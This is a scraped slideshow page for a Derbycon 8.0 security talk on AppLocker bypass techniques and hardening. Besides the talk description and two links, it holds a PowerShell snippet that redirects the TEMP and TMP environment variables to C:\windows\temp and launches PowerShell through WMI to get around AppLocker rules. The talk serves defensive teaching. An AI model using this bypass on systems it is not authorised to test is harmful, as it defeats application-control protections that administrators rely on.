Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

App-o-Lockalypse now!

710 views

Published on

Slides from session at Derbycon 8.0.
Description:
Want to get a good overview of AppLocker and the different AppLocker bypasses and at the same time learn how defenders can harden their environments to prevent them? Then this is a talk you don't want to miss. This talk will cover a vast amount of bypass techniques and how to harden AppLocker to make it even harder to bypass. Giving you help to either start or avoid an App-o-Lockalypse.

Published in: Technology
  • Be the first to comment

App-o-Lockalypse now!

  1. 1. Can also use Mklink /H
  2. 2. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)
  3. 3. https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0
  4. 4. $CurrTemp = $env:temp $CurrTmp = $env:tmp $TEMPBypassPath = "C:windowstemp" $TMPBypassPath = "C:windowstemp" Set-ItemProperty -Path 'hkcu:Environment' -Name Tmp -Value "$TEMPBypassPath" Set-ItemProperty -Path 'hkcu:Environment' -Name Temp -Value "$TMPBypassPath" Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell" sleep 5 #Set it back Set-ItemProperty -Path 'hkcu:Environment' -Name Tmp -Value $CurrTmp Set-ItemProperty -Path 'hkcu:Environment' -Name Temp -Value $CurrTemp

×